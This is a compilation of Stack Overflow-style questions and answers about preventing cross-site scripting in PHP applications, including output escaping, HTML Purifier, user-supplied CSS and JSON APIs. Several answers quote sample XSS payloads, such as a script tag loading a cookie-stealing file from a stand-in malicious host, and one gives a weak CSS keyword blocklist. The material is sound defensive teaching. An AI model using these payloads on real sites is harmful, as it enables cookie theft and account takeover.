I'm reading about XSS to educate myself on security while working with PHP. I'm referring to this article, in which they talk about XSS and some of the rules that should be adhered to.
Could someone explain Rules #0 and #1 for me? I understand some of what they are saving, but when they say untrusted data do they mean data entered by the user?
I'm working on some forms and I'm trying to adhere to these rules to prevent XSS. The thing is, I never output anything to the user once the form is complete. All I do is process data and save it to text files. I've done some client-side and a lot of server-side validation, but I can't figure out what they mean by never insert untrusted data except in allowed locations.
By escaping do they mean closing tags - </>?
Rule #0 means that you should not output data in locations of your webpage, where it's expected to run instructions.
As shown on your url, do not put user generated data inside <script>tags. For example, this is a no-no:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+<?=$username?>+"!";
</script>
Looks pretty safe, right? Well, what if your $username variable contains the following values:
""; console.log(document.cookie);//
So, on a website what you're going to display is going to be this:
<script>
var usernameSpanTag = document.getElementById('username');
usernameSpanTag.innerText = "Welcome back, "+""; console.log(document.cookie);//+"!";
</script>
So someone can easily steal your user's cookies and elevate their privileges. Now imagine that you're using similar code to say, update which user created the latest post, and shows up via AJAX. That's a disaster waiting to happen if you do something like above (and do not sanitize the username in the first place).
Same applies for <style>,<img>, <embed>, <iframe> or any other tag that lets you run scripts or import resources. Also applies to comments. Browsers ignore comments, but some interpreters like the JSP parser handles HTML comments as template text. It doesn't ignore its contents.
Rule #1 is pretty similar tu rule #0, if you're developing web applications at some point or another you will have to output user generated data, whether it is an email address, a username, a name, or whatever.
If you're developing a forum, probably you may want to give your users some styling options for their text. Basic stuff like bold letters, underlined and italics should suffice. If you want to get fancy, you may even let your users change the font.
An easy way to do it, without too many complications, is just letting users write their own HTML if they choose to do so, so if you output HTML from your users in "safe" locations like between <p> tags, then that's a disaster waiting to happen as well.
Because I can write:
Hey everybody, this is my first post <script src="//malicioussite.io/hackingYoCookiez.js"></script>!
If you don't escape that input, people will only see:
Hey everybody, this is my first post`!
but your browser will also see an external javascript that tells it to send everybody's cookies to a remote location.
So always escape the data. If you're using PHP you can use htmlentities or use a template engine like Twig, that automatically escapes the output for you.
Related
I know similar questions have been asked but I am struggling to work out how to do it.
I am building a CMS, rather primitive right now, but it's as a learning exercise; in a production site, I would use an existing solution for sure.
I would like to take user input, which can be styled in a WYSIWYG editor. I would also like them to be able to insert images inline.
I understand I can store HTML in the database but how can I safely re-render this. I know there is no problem with the HTML being stored but it is my understanding that XSS become an issue if I were to just simply dump the user-generated code onto a layout template.
So the question put simply, is how can I store and safely rerender user content in cms? I am using Laravel and PHP. I also have a little knowledge of javascript if its required.
For a CMS where you want to allow some tags but not others, then you want something like HTML Purifier. This will take HTML and run it against a whitelist and regenerate HTML that is safe to display back to the user.
A good and cheap way to avoid cross-site scripting is to get your php program to entitize everything from your users' input before storing it in the database. That is, you want to take this entry from a user
Hi there sucker! I just hacked your site.
<script>alert('You have been pwned!')</script>
and convert it to this before putting it into your database.
Hi there sucker! I just hacked your site.
<script>alert('You have been pwned!')</script>
When you pass < to a browser, it renders it as <, but it doesn't do anything else with it.
The htmlentities() function can do this for you. And, php's htmlspecialchars_decode() can reverse it if you need to. But you shouldn't reverse the operation unless you absolutely must do so, for example to load the document into an embedded editor for changes.
You can also choose to entitize user-furnished text after you retrieve it from your database and before you display it. If you get to the point where several people work on your code, you may want to do both for safety.
You can also render user-provided input inside <pre>content</pre> tags, which tells the brower to just render the text and do nothing else with it.
(Use right-click Inspect on this very page to see how Stack Overflow handles my malicious example.)
On my website I want to include a text box that will allow the members to change anything they want css wise on their profiles....but I don't want to wake up one morning to find my site has been hacked or someone typoed and destroyed everything or accessed things they shouldn't.
Is there any easy way to verify that the text they input is css only? I saw another question on here that was similar, it had XSS cheat sheet and tips for what to disable (< and ]]> and < ![), but I don't know if that will be enough. I will definitely use that info though.
Essentially I want to just make PHP call any custom css and insert it between script tags for the users profile. I want to allow as much css as possible. Is this the best way to go about it? I don't have the know how to make up a system to generate safe files, or the patience to make up an entire section with options (especially since I want to give members more freedom with their profiles).
Any advice is appreciated, and if anyone knows of some script that does this already that would rock too and help me figure out what to do :D.
When a user is logged in, add a separate <link> element for that user. The href can point to a script that generates the css for the user, for instance customcss.php?userid=1234&version=2 *). The script only needs to return everything the user has entered before. Because you enclose it as a separate CSS file, the browser will always treat it as such and will never run any scripts. Any HTML or Javascript is just treated as invalid CSS.
Note however, that there's little harm anyway in including scripts for that matter, because they will only run in the browser of the logged in user, so they can only hack their own view of your site. If they want to inject Javascript, they can still do that by writing their own browser plugins, so you won't open up a possibility that wasn't there before.
The main thing you need to worry about are
Usability. What if the user makes a mistake and accidentally hides the Body element. How will they be able to reset it?
SQL injection. No matter what you do or do not allow, always make sure your input is sanatized.
PHP injection. Don't execute (eval) user content. Ever.
Hiding user information. Add a code to the customcss.php url to prevent other users from guessing a user id, gaining insight into the customizations of other users.
*) I've added a version number to the CSS url, which you should update in the database each time a user updates their CSS. If you don't do that, the browsers will cache the old CSS and users will start complaining to you, because their changes won't become visible.
I guess this should be enough
$style = $_POST['style'];
$style = strip_tags($style);
$forbiddenStuff = array(
'-moz-binding',
'expression',
'javascript:',
'behaviour:',
'vbscript:',
'mocha:',
'livescript:',
);
$style = str_ireplace($forbiddenStuff, '', $style);
store $style in db , and render on user profile.
Please note that this solution is copied from a well known software and which has a big community, so i hope this should be perfect.
O hai MySpace…
Just give users the ability to specify colours and images from a web form, and construct a user-specific style sheet from that. Allowing users to specify their own CSS in its entirety will just lead to ugly, ugly pages. See: MySpace 1.0.
The admin users of a module that I'm developing want to add a functionality of automatically write links in the textarea(s) they fill.
For example, if they write:
Please visit our page http://page.com
They want that http://page.com automatically is converted in a link:
http://page.com
I want to do this in the best possible way in order of usability and performance.
I can't change the type of field (textarea) but I can do modifications with PHP and JavaScript that always is active (No Frameworks).
The users frequently edit the fields and the links are only important when they "publish" the forms, because the content of those textarea(s) are displayed inside an HTML table.
A textarea input could have more than one link.
I appreciate your opinions and points of view to resolve this common situation.
In my opinion, you should handle this situation:
using PHP,
after reading the textarea contents from DB where it was stored,
before sending the HTML output
I don't know the details of your application context and its users, but when you output any user input as HTML, you must take care of security issues as XSS attacks, and others.
If $textarea_contents is the variable where the textarea contents are (read from the DB), I would apply the htmlspecialchars function first:
$output = htmlspecialchars( $textarea_contents );
After this, you can parse the output string or use a regular expression to transform the URLs in anchor elements. You choice depends on the level of precision you want. A couple of choices are:
http://code.iamcal.com/php/lib_autolink/lib_autolink.phps
http://jmrware.com/articles/2010/linkifyurl/linkify.html
And it is good to know this recommended reading about the complex problem of linkifying strings (from the creator of Stack Overflow website):
http://www.codinghorror.com/blog/2008/10/the-problem-with-urls.html
Good luck!
$code = preg_replace('/((https?|ftp):\/\/(?:[A-Z0-9-]+.)+[A-Z]{2,6}([\/?].+)?)/i','$1',$code);
(Regex Source)
This RegEx is better since take care of the parameters passed in the URL and finish when the URL finish and don't take spaces or other following words.
(https?|ftp)://([-A-Z0-9.]+)(/[-A-Z0-9+&##/%=~_|!:,.;]*)?(\?[A-Z0-9+&##/%=~_|!:,.;]*)?
Any other suggestion to face up this situation? Use JavaScript or PHP? Any idea?
I always run user supplied input through both the html entities and mysql real escape string functions.
But now I am building a CMS which has a WYSIWYG editor in the admin section. I noticed that using htmlentities() on the WYSIWYG edited user content removed all styles and throws a bunch of quotes on the front end article page (as can be expected).
So is it ok to not clean the html/javascripts entered by the user in this situation? I will still use mysql_real_escape_string() which doesn't conflict.
Although the admin in the only one who will have access to the back end, I can think of at least one scenario where suppose a hacker somehow got access to the create a post page, now although they can wreak havoc by deleting posts, etc, instead they choose to use this as an opportunity to send visitors to his site by making this post:
<script>window.location = "http://evilsite.com"</script>
So what should I do? and also are there any functions that will disable javascript but not html and inline css?
The WYSWYG is TinyMCE by the way.
It is never OK to not clean user input. Anybody can sabotage your system, just like you hypothesized. This kind of risk is simply not worth taking.
Although, for your case it would depend on the WYSIWYG editor you use. Look around TinyMCE's documentation or ask around, and see what it says about displaying/rendering HTML output in its rich text editor with regards to XSS vulnerabilities.
I am thinking of secure ways to serve HTML and JSON to JavaScript. Currently I am just outputting the JSON like:
ajax.php?type=article&id=15
{
"name": "something",
"content": "some content"
}
but I do realize this is a security risk -- because the articles are created by users. So, someone could insert script tags (just an example) for the content and link to his article directly in the AJAX API. Thus, I am now wondering what's the best way to prevent such issues. One way would be to encode all non alphanumerical characters from the input, and then decode in JavaScript (and encode again when put in somewhere).
Another option could be to send some headers that force the browser to never render the response of the AJAX API requests (Content-Type and X-Content-Type-Options).
If you set the Content-Type to application/json then NO Browser will execute JavaScript on that page. This is apart of RFC-4627, and Google uses this to protect them selves. Other Application/ Content types follow similar rules.
You still have to worry about DOM Based XSS, however this would be a problem with your JavaScript, not really the content of the json. Another more exotic security concern with Json is information leakage like this vulnerability in gmail.
Make sure to always test your code. There is the Sitewatch free xss scanner, or the open source Skipfish and finally you could test this manually with a simple <script>alert(/xss/)</script>.
Instead of worrying about how you could encode the malicious code when you return it, you should probably take care that it does not even get into your database. A quick google search about preventing cross-site scripting and input validation might help you here. Cheers
If the user has to be logged in to view the web page then secure the ajax.php with the same authorization mechanism. Then a client that's not logged in cannot access ajax.php directly to retrieve the data.
I don't think your question is about validating user input, as others pointed out. You don't want to provide your JSON api to other people... right?
If this is the case then there isn't much you can do... in fact, even if you were serving HTML instead of JSON, people would still be doing HTML scraping to get what they wanted from your site (this is how Search Engine spiders work).
A good way to prevent scraping is to allow only a specific amount of downloads from an IP address. This way if someone is requesting http://yoursite.com/somejson.json more than 100 times a day, you probably know it's a scraper, and not someone visiting your page for 100 times in 1 day.
Insertion of script tags (or SQL) is only a problem if you fail to ensure it isn't at the point that it could be a problem.
A <script> tag in the middle of a comment that somebody submits will not hurt your server and it won't hurt your database. What it would hurt, if you fail to take appropriate measures, would be a page that includes the comment when you subsequently serve it up and it reaches a client browser. In order to prevent that from happening, your code that prepares the page must make sure that user-supplied content is always scrubbed before it is exposed to an unaware interpreter. In this case, that unaware interpreter is a client web browser. In fact, your client web browser really involves two unaware interpreters: the HTML parser & layout engine and the Javascript interpreter.
Another important example of an unaware interpreter is your database server. Note that a <script> tag is (almost certainly) harmless to your database, because "" doesn't mean anything in SQL. It's other sorts of input that cause problems for SQL, like quotes in strings (which are harmless to your HTML pages!).
Stackoverflow would be pretty lame if I couldn't put <script> tags in my answers, as I'm doing now. Same goes for examples of SQL Injection attacks. Recently somebody linked a page from some prominent US bank, where a big <textarea> was footnoted by a warning not to include the characters "<" or ">" in whatever you typed. Predictably, the bank was ridiculed over hundreds of Reddit comments, and rightly so.
Exactly how you "scrub" user-supplied content depends on the unaware interpreter to which you're delivering it. If it's going to be dropped in the middle of HTML markup, then you have to make sure that the "<", ">", and "&" characters are all encoded as HTML entitites. (You might want to do quote characters too, if the content might end up in an HTML element attribute value.) If the content is to be dropped into Javascript, however, you may not need to worry about HTML escaping, but you do need to worry about quotes, and possibly Unicode characters outside the 7-bit range.
For outputting safe html from php, I recommend http://htmlpurifier.org/